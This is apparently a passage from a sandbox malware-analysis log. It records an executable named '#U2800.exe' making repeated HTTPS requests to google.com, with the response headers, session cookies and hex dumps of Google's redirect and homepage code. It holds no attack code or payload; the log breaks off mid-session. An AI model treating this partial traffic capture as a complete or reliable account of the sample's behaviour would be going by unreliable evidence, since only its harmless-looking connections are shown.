                                                                                                                                                                                                        2025-01-14 11:40:01 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        8192.168.2.449732142.250.185.2064436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: google.com
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: https://www.google.com/
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-S92-omqNFL2lo2XE4wNqbw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:01 GMT
                                                                                                                                                                                                        Expires: Thu, 13 Feb 2025 11:40:01 GMT
                                                                                                                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        Content-Length: 220
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        9192.168.2.449740142.250.185.2064436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: google.com
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: https://www.google.com/
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-fMoj1BYdqywWQfLGOiReXg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:01 GMT
                                                                                                                                                                                                        Expires: Thu, 13 Feb 2025 11:40:01 GMT
                                                                                                                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        Content-Length: 220
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        10192.168.2.449735142.250.185.2064436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC36OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: google.com
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC631INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                        Location: https://www.google.com/
                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-CaoVJRapQzYRGAXFaQBjWA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:01 GMT
                                                                                                                                                                                                        Expires: Thu, 13 Feb 2025 11:40:01 GMT
                                                                                                                                                                                                        Cache-Control: public, max-age=2592000
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        Content-Length: 220
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC220INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                                                                                                                                        Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com/">here</A>.</BODY></HTML>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        11192.168.2.449747142.250.185.2284436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1198INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:02 GMT
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-n_ayC3usWyR8ylFlcYBgCA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Set-Cookie: AEC=AZ6Zc-WAQUv2qvqbdOkZuTfaxfubC_itFEDkS5q11hgfeqdH2vYRGCTnLw; expires=Sun, 13-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                        Set-Cookie: NID=520=BRInCNLPVtMgLqmoQ9yfz36jrvXwNVtOn_QTCgAVQHdTrVNvepaaRaqndhUVVkV1hg4QaXSGVHGygPDcMVKMQNRzpPps6IV8o1H7lzRUFVE1PTs3EfMmWXFReoohGDOZoDbvfc4Vp8BybR-NianjyjucDLSMrnPXGCHc16YJDD9Gqpy6diemGZDItDSkkDBLChtuEMrgpp_ERBb7Pg; expires=Wed, 16-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC192INData Raw: 34 61 33 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20
                                                                                                                                                                                                        Data Ascii: 4a30<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images, videos and more. Google
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6f 64 70 2c 20 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 67 2f 31 78 2f 67 6f 6f 67 6c 65 67 5f 73 74 61
                                                                                                                                                                                                        Data Ascii: has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_sta
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 35 35 39 2c 31 31 2c 31 37 39 31 2c 32 38 31 2c 31 37 39 2c 36 33 2c 35 33 2c 31 35 31 2c 33 36 31 2c 33 39 34 2c 36 37 36 2c 32 2c 32 34 31 2c 37 30 32 2c 31 39 37 2c 31 39 32 2c 36 31 2c 31 34 32 2c 32 35 36 2c 33 34 36 2c 36 31 2c 31 38 33 2c 39 31 36 2c 32 36 38 2c 35 36 34 2c 32 35 37 2c 36 36 39 2c 31 36 34 39 2c 31 32 32 2c 32 30 36 2c 32 30 31 2c 31 32 30 39 2c 31 38 33 2c 36 2c 31 30 31 2c 31 37 2c 33 2c 33 34 31 2c 31 30 37 2c 33 2c 33 35 31 2c 31 32 34 30 2c 32 2c 34 39 36 2c 39 33 31 2c 36 30 32 2c 37 33 2c 31 36 35 2c 33 2c 34 31 38 2c 36 38 38 2c 39 33 38 2c 31 2c 35 2c 34 2c 34 2c 34 2c 31 34 30 2c 33 36 37 2c 33 36 30 2c 36 34 38 2c 33 2c 32 31 39 2c 34 39 39 2c 32 39 39 2c 33 34 32 2c 31 35 2c 31 2c 31 2c 32 33 2c 32 2c 35 32 2c 32 33 37
                                                                                                                                                                                                        Data Ascii: 559,11,1791,281,179,63,53,151,361,394,676,2,241,702,197,192,61,142,256,346,61,183,916,268,564,257,669,1649,122,206,201,1209,183,6,101,17,3,341,107,3,351,1240,2,496,931,602,73,165,3,418,688,938,1,5,4,4,4,140,367,360,648,3,219,499,299,342,15,1,1,23,2,52,237
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 2c 63 2c 68 2c 65 29 7b 65 3d 65 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 65 3b 64 7c 7c 28 64 3d 72 28 61 2c 62 2c 65 2c 63 2c 68 29 29 3b 69 66 28 64 3d 71 28 64 29 29 7b 61 3d 6e 65 77 20 49 6d 61 67 65 3b 76 61 72 20 66 3d 6d 2e 6c 65 6e 67 74 68 3b 6d 5b 66 5d 3d 61 3b 61 2e 6f 6e 65 72 72 6f 72 3d 61 2e 6f 6e 6c 6f 61 64 3d 61 2e 6f 6e 61 62 6f 72 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6d 5b 66 5d 7d 3b 61 2e 73 72 63 3d 64 7d 7d 3b 67 6f 6f 67 6c 65 2e 6c 6f 67 55 72 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 62 3d 3d 3d 76 6f 69 64 20 30 3f 6b 3a 62 3b 72 65 74 75 72 6e
                                                                                                                                                                                                        Data Ascii: l=function(){return null};google.log=function(a,b,d,c,h,e){e=e===void 0?k:e;d||(d=r(a,b,e,c,h));if(d=q(d)){a=new Image;var f=m.length;m[f]=a;a.onerror=a.onload=a.onabort=function(){delete m[f]};a.src=d}};google.logUrl=function(a,b){b=b===void 0?k:b;return
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 74 28 29 7d 2c 21 30 29 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 67 62 7b 66 6f 6e 74 3a 31 33 70 78 2f 32 37 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 68 65 69 67 68 74 3a 33 30 70 78 7d 23 67 62 7a 2c 23 67 62 67 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 30 7d 23 67 62 7a 7b 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 34 70 78 7d 23 67 62 67 7b 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 23 67 62 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 6f
                                                                                                                                                                                                        Data Ascii: t()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gbz{left:0;padding-left:4px}#gbg{right:0;padding-right:5px}#gbs{background:transparent;po
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 68 74 3a 2d 32 70 78 3b 62 6f 74 74 6f 6d 3a 2d 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 34 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 3b 66 69 6c 74 65 72 3a 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 3b 2a 6f 70 61 63 69 74 79 3a 31 3b 2a 74 6f 70 3a 2d 32 70 78 3b 2a 6c 65 66 74 3a 2d 35 70 78 3b 2a 72 69 67 68 74 3a 35 70 78 3b 2a 62 6f 74 74 6f 6d 3a 34 70 78 3b 2d 6d 73 2d 66 69 6c 74 65 72 3a 22 70 72 6f 67 69 64 3a 44 58 49 6d 61 67 65 54 72 61 6e 73 66 6f 72 6d 2e 4d 69 63 72 6f 73 6f 66 74 2e 42 6c 75 72 28 70 69 78 65 6c 72 61 64 69 75 73 3d 35 29 22 3b 6f 70 61 63 69 74 79 3a 31 5c 30 2f 3b 74 6f 70 3a 2d
                                                                                                                                                                                                        Data Ascii: ht:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:progid:DXImageTransform.Microsoft.Blur(pixelradius=5);*opacity:1;*top:-2px;*left:-5px;*right:5px;*bottom:4px;-ms-filter:"progid:DXImageTransform.Microsoft.Blur(pixelradius=5)";opacity:1\0/;top:-
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 7d 2e 67 62 7a 30 6c 20 2e 67 62 74 73 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 67 62 74 73 61 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 39 70 78 7d 23 67 62 7a 20 2e 67 62 7a 74 2c 23 67 62 7a 20 2e 67 62 67 74 2c 23 67 62 67 20 2e 67 62 67 74 7b 63 6f 6c 6f 72 3a 23 63 63 63 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 62 32 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 67 62 74 6f 20 2e 67 62 7a 74 20 2e 67 62 74 62 32 2c 2e 67 62 74 6f 20 2e 67 62 67 74 20 2e 67 62 74 62 32 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 30 7d 2e 67 62 74 62
                                                                                                                                                                                                        Data Ascii: px;padding-top:2px}.gbz0l .gbts{color:#fff;font-weight:bold}.gbtsa{padding-right:9px}#gbz .gbzt,#gbz .gbgt,#gbg .gbgt{color:#ccc!important}.gbtb2{display:block;border-top:2px solid transparent}.gbto .gbzt .gbtb2,.gbto .gbgt .gbtb2{border-top-width:0}.gbtb
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 23 67 62 6d 70 69 2c 23 67 62 6d 70 69 64 2c 23 67 62 6d 70 69 77 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 23 67 62 67 35 7b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 35 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 67 62 74 6f 20 23 67 62 67 73 35 7b 70 61 64 64 69 6e 67 3a 37 70 78 20 35 70 78 20 36 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67 62 69 35 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 69 6d 61 67 65 73 2f 62 5f 38 64 35 61 66 63 30 39 2e 70 6e 67 29 3b
                                                                                                                                                                                                        Data Ascii: ;padding-left:20px;margin-top:10px;position:relative}#gbmpi,#gbmpid,#gbmpiw{*display:inline}#gbg5{font-size:0}#gbgs5{padding:5px !important}.gbto #gbgs5{padding:7px 5px 6px !important}#gbi5{background:url(https://ssl.gstatic.com/gb/images/b_8d5afc09.png);
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 23 67 62 64 34 20 2e 67 62 6d 63 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 66 35 66 35 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 7d 23 67 62 64 34 20 2e 67 62 73 62 69 63 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 3a 76 65 72 74 69 63 61 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 70 78 7d 23 67 62 6d 70 64 76 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 65 62 65 62 65 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 68 61 64
                                                                                                                                                                                                        Data Ascii: rder-top:1px solid #bebebe;font-size:0;margin:10px 0}#gbd4 .gbmc{background:#f5f5f5;padding-top:0}#gbd4 .gbsbic::-webkit-scrollbar-track:vertical{background-color:#f5f5f5;margin-top:2px}#gbmpdv{background:#fff;border-bottom:1px solid #bebebe;-moz-box-shad
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1390INData Raw: 23 30 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 3a 31 31 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 23 67 62 70 6d 73 7b 2a 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 67 62 70 6d 73 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 23 67 62 6d 70 61 6c 7b 2a 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 63 6f 6c 6c 61 70 73 65 3b 62 6f 72 64 65 72 2d 73 70 61 63 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 67 62 6d 70 61 6c 61 2c 2e 67 62 6d 70 61 6c 62 7b 66 6f 6e 74 3a 31 33 70 78 20 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72
                                                                                                                                                                                                        Data Ascii: #000 !important;font:11px Arial,sans-serif}#gbpms{*white-space:nowrap}.gbpms2{font-weight:bold;white-space:nowrap}#gbmpal{*border-collapse:collapse;border-spacing:0;border:0;margin:0;white-space:nowrap;width:100%}.gbmpala,.gbmpalb{font:13px Arial,sans-ser


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        12192.168.2.449754142.250.185.2284436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC40OUTGET / HTTP/1.1
                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                        2025-01-14 11:40:02 UTC1199INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:02 GMT
                                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                                        Cache-Control: private, max-age=0
                                                                                                                                                                                                        Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                                                        Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-P8f2z9AOm2Hrd_fKcBR31Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                        Set-Cookie: AEC=AZ6Zc-UGzh0AzPMcLKiqvvbr1dYBHdQQIRf9U_yo9gUW_pimRB-jULeuNQ; expires=Sun, 13-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                                                        Set-Cookie: NID=520=LM_q2mtH2jMufhXO-cfAAoQiHnJX_Uk9G-7gcQXiukBW5afmXyIhVCGnzWoesln1tOAmV2fbmTHzhknhBlSAX6kYXgfZ2jz9CGIE_8t5ZYj7yd_jQ79CxAzX42DgSYOmaxjP26N4qor-RzRxyR2IiLcAcLAB_KB-66YqM1w-0TiszFxJhR5x98LZqQd_07i-Rqb4Yxf7Ld8-1p2UiDQ; expires=Wed, 16-Jul-2025 11:40:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
